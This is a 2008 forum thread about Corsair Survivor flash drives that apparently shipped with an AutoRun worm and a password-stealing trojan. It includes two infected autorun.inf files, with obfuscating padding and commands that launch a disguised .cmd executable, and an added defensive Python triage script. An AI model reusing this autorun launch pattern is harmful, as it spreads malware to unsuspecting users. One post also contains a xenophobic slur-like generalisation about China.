apple Posted January 22, 2008
Kaspersky AV (WinXP SP2 PL) reports "Worm.Win32.AutoRun.bus" in autorun.inf and "Trojan-PSW.Win32.OnLineGames.npx" in f.cmd in the root of a Corsair Survivor 8 GB. They are meant to run Truecrypt-43a software. Is this a false alarm? :eek:
Corsair Employees RAM GUY Posted January 22, 2008
Yes, we think it is a false alarm, but we have not seen this virus warning. Can you send us the drive so we can check it to be sure? Please call our Tech support at 800-205-7657 and ask for me.
tsuessner Posted January 23, 2008
Hello, it's right - I got the Survivor stick today too. Now I have a virus/worm on my computer. It infects all removable devices with the files f.cmd and autorun.inf. It isn't shown in Explorer even though the folder settings are set to show all files and system files!
To simply find the virus:
- go to the command prompt (Start->Run->cmd.exe->OK)
- then type the drive letter of the stick: K:{return}
- now type: attrib <~~ this program shows the file attributes - and lists the files with the attribute RHS, too.
Now you can find these files! If anyone has a removal tool for this worm - please send it to me!
Best wishes, Tom
Corsair Employees RAM GUY Posted January 23, 2008
Please call our Tech support at 800-205-7657 and ask for me.
tsuessner Posted January 23, 2008
Hmm, my spoken English is not really good and the cost of the phone call is too expensive for me. In the meantime I think I've removed the infection routine from the stick and my computer... I hope I removed all critical things from my PC manually. I have the source programs from the stick packed in an archive - if you want it, I can send it to you. Or do you have any other questions for me?
Best wishes from Germany! Tom
Corsair Employees RAM GUY Posted January 23, 2008
Can you tell me the numbers off of the tip of the flash drive so I can try to get one from the same lot?
apple Posted January 23, 2008 Author
> Hello, it's right - I got the Survivor stick today too. Now I have a virus/worm on my computer. It infects all removable devices with the files f.cmd and autorun.inf. Tom
Kaspersky just blocked the files, but Norton just deleted f.cmd without prompting, claiming that it contains W32.Gammima.AG. Could you send me the proper f.cmd and autorun.inf for comparison? Below is my autorun.inf:
;5LqKdSls4k4ssa214rJs34HaaAp01oCkd4wl17aLirc3K482k3Jq4sDjdeo0Fl4lK3apilijd5L5kl25a329Z27isi9r
[AutoRun]
;Sr3weJpjlJofKU4Zl4Dor2kSfsK4olJKkf9fd74o4SwsKqj5w38sq5aAL2wa03la2we5w3aq4le2D008dq10LsSr4KiDi0kDk3L3ia4aD5seA
open=f.cmd
;sdl8awqdjaA9KssqSllK1aF2Sa0wkdJf3o34DZOrqiKronULKkLer97kC22wi3ded2sKL0qdDi2kka4w3i2d50Sk2LkelackkHif5osLA
shell\open\Command=f.cmd
;kd3KmLZc1oLljkfra37irs7e3DawiL5Sra1il43o3aK1sd9k4iKa4dJqkdko02i94wi20AweDLld4IjJdF1awfCK3swDw245i49Lo5n6kes4a
shell\open\Default=1
;3alklD44i20sDq4eaDsLd2di1CwlcoLiisqAfdDU3HZ4jSaaki3wdw3dA3Klk8kqoaA5swkj73a8j0lqr5aA4kkJsSIailrrdi924S2L
shell\explore\Command=f.cmd
;s5q42li7ASi3Cwdpkolrkck38l8r6a4s1i2ALw4aa2KFq5r20a3Lieeff0dsLwDaDKqJDs0rk2kSd3r19i9jdqlKJij0DK
tsuessner Posted January 23, 2008
Hello,
The number of the stick: FMB7C0510 (16GB Survivor)
The content of autorun.inf:
;K3Hj1jwswk4wkeCL5qioa3jSfddLqlasaLlsO4jZq2kLldpadd2c7Jss5Laarr91A9sk070j5e12iUKfl40Kw0pLslkowKi4AAKlwZf
[AutoRun]
;q8SZdola3ok3qAw2a2aka41w4Ka7wJeo25i1Ln5jO4ofks33KjpkliosLAwseJKUI75kCsd029klD0o4i3Hj3l7asei2kaDkoSXr9lFiJAwwsa
open=um.cmd
;7qljd5kJwkKlq5SpasdLA2fA2w3K39
shell\open\Command=um.cmd
;kI3wfoD3o9D8la4o2iaiwdkrsJ4kJ2oo3i293ssK3jDs7L440r0rwaiAifwrk1D0nik5kL2Kq3wKls0ql78dk4Oafkem3oL7FaliDasiiZJdeDZ20q380s5516lfk2L
shell\open\Default=1
;33Kfi0awa2l4a
shell\explore\Command=um.cmd
;r8aaLkkKeLsA3kkK2w03Z2Jwqss0Dpckk7s33Jjjdlnesl2iDakFD6jfOr8D1ewSafqDI5kriliDk
Corsair Employees RAM GUY Posted January 24, 2008
Can you right click on the File and get the date the File was created please?
apple Posted January 24, 2008 Author
> Can you right click on the File and get the date the File was created please?
Memory was bought on the 22nd, file has date 14.01.2008, 18:01:07.
Codes shown by reseller (http://www.komputronik.pl):
KT: [uSBPENCORSAIRSV8GB]
producenta: [CMFUSBSRVR-8GB]
MAX: [RF-PD-COR-029]
http://www.komputronik.pl/pelny.php?id=46020
tsuessner Posted January 24, 2008
Hello, okay, yesterday I made a RAR archive of these viruses - and f.cmd shows a last-change date of 10.01.2008 - I got it yesterday (23.01.2008)! Half a day to disinfect my system - the antivirus AVK from GDATA did not detect the virus.
Best wishes, Tom
Corsair Employees RAM GUY Posted January 24, 2008
I have sent that to our flash Engineer but the dates would suggest the VIRUS came from your system not the flash drive.
tsuessner Posted January 24, 2008
Hello, this can't be real. My system was definitely clear - and why does the other person report the same error - the same virus? And the second reason: since I inserted the stick, a TCP connection has been tried to negotiate, but my firewall has blocked this connection. The Virus is no removed - but check your engineering system twice! I'm really sure.
Best regards!
Corsair Employees RAM GUY Posted January 24, 2008
We have and have tested them again, but if someone sees this we really need to see the drive before you write to it so we can trace where it might be coming from.
apple Posted January 25, 2008 Author
> I have sent that to our flash Engineer but the dates would suggest the VIRUS came from your system not the flash drive.
Highly unlikely. My system is as clean as boiled water :) and 100% original Firewall (hardware - asus router) Kaspersky internet security (second firewall), latest patches in XP and newest versions of programs (secunia tested), and it was clean before I bought memory (blister). I think it is still clean ("autorun" is disabled in my system so it couldn't run).
I suppose this is a false alarm. Some viruses have encrypting procedures (then demand payments) and AV programs have their signatures. I guess your pendrives have programs to secure pendrive contents and they are meant to be automatically installed. This may look like blackmailing virus behaviour. Could you send us links to those original files for comparison? Does my autorun.inf (posted) look infected? Maybe it is supposed to look like this?
Corsair Employees RAM GUY Posted January 26, 2008
There should not be any auto run files at all. The only thing we put on the drive is the TrueCrypt.exe file.
ToniCipriani Posted January 26, 2008
I can actually confirm this. I got my RMA'ed Survivor 4GB today, plugged it in, and saw the exact same files: f.cmd, q83(something).bat and autorun.inf. And it's impossible that BOTH my computers are infected. I'm now in the process of going into Linux and cleaning my stick.
ToniCipriani Posted January 26, 2008
FYI, the lot code of my Survivor is: G04G FMB7C0263
Thanks. I've formatted the key and it's fine now (although I lost some not so important files...)
MikerX Posted January 27, 2008
Yes Yes.... Sure dudes. I have the same **** on my flash drives. 2 x 16GB Survivor. (They came in last Friday. And the file dates were 10.01.08, but I deleted them. I still have a zip file of one.)
And.. NO ONE can tell me this was WANTED. As this is an autorun to call the f.cmd file. WHO would put an .EXEcutable file into a .CMD ending. This is a masking thing. ".CMD" are usually text only. So this is fishy. I don't have a virus scanner, but I have for God's sake autorun disabled... And.. the file date is older than the "buying date". So this cannot come from my PC either. As no other flash drives have this **** on it.
Here are my Serial Numbers. 2x G16G FMB7C001 (I cannot find any better serial number).
I hope this **** gets fixed! That is what happens if you produce in China. They are infecting us slowly with their junk! I attached the -FILE-. Have a lot of fun!
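Added example, not part of any post in this thread: a Python triage of an autorun.inf like the ones apple and tsuessner posted. It lists what the file launches, counts the padding comment lines, and checks MikerX's point that a .cmd target is really an executable by looking for the "MZ" header. The sample file, its padding strings, the file bytes and the function names are all constructed for illustration.

```python
import re

# Constructed sample shaped like the autorun.inf files posted in this thread;
# the padding comments are made-up stand-ins, not the posters' strings.
SAMPLE_INF = r"""
;x7Qa2LkD9sJw4ZpR0tYu3HbN6mVc8EfG1iOxK5
[AutoRun]
;p0Lw8SdK3jHq7ZnB2vCx5MtR9yUe4AiO6gFk1
open=f.cmd
shell\open\Command=f.cmd
shell\open\Default=1
;m4Tz9QeW1rYu6IoP3aSd8FgH2jKl5ZxC7vBn0
shell\explore\Command=f.cmd
"""
# Constructed leading bytes of the drive's files: f.cmd starts with "MZ".
SAMPLE_FILES = {"f.cmd": b"MZ\x90\x00\x03\x00"}

LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

def parse_autorun(text):
    """Return ({launch key: command}, padding comment count)."""
    targets, padding, in_section = {}, 0, False
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith(";"):
            # Long comments without spaces are filler, not documentation.
            padding += len(line) > 20 and " " not in line
        elif line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if value and LAUNCH_KEY.match(key):
                targets[key.lower()] = value
    return targets, padding

def triage(inf_text, files):
    """files maps a lower-case file name to its first bytes on the drive."""
    targets, padding = parse_autorun(inf_text)
    findings = [f"{padding} padding comment line(s)"] if padding else []
    for name in sorted({cmd.split()[0].lower() for cmd in targets.values()}):
        findings.append(f"autorun launches {name}")
        ext = name.rsplit(".", 1)[-1]
        # A PE/DOS executable starts with "MZ"; a real .cmd/.bat is text.
        if ext in ("cmd", "bat") and files.get(name, b"")[:2] == b"MZ":
            findings.append(f"{name} is an executable named .{ext}")
    return findings

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_INF, SAMPLE_FILES)))
```

Run it from a machine that does not act on autorun.inf, reading the drive's files as plain data.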
Garvin Posted January 28, 2008
Warning: The above zip file, f.zip, is infected with the Trojan "Trojan-P5W.Win32OnLineGames.npx".
Wired Posted January 28, 2008
I've removed the file to be safe.
ToniCipriani Posted January 28, 2008
> I hope this **** gets fixed! That is what happens if you produce in China. They are infecting us slowly with their junk!
Hold the hate dude... The Corsair drives are made in Taiwan with chips from Korea. I did a bit more searching and it seems like it's called Kavo, and it appears to originate from Taiwan. There's a removal tool on this page: http://www.filination.com/tech/2007/11/29/kill-kavo-the-ntdelect-worm-trojan-removal-tool-patch/
apple Posted January 28, 2008 Author
> Hold the hate dude... The Corsair drives are made in Taiwan with chips from Korea.
Does it matter where memory is assembled? I think it's confirmed - Corsair Survivor is infected and "somebody" owes us at LEAST an apology.
Wired Posted January 28, 2008
There's far from enough proof. Products don't go straight from manufacturing to your hand. Could be the distributor testing them, could be the store, could be many things. Where did each of you buy your drives?
ToniCipriani Posted January 28, 2008
My drive was a RMA from Corsair.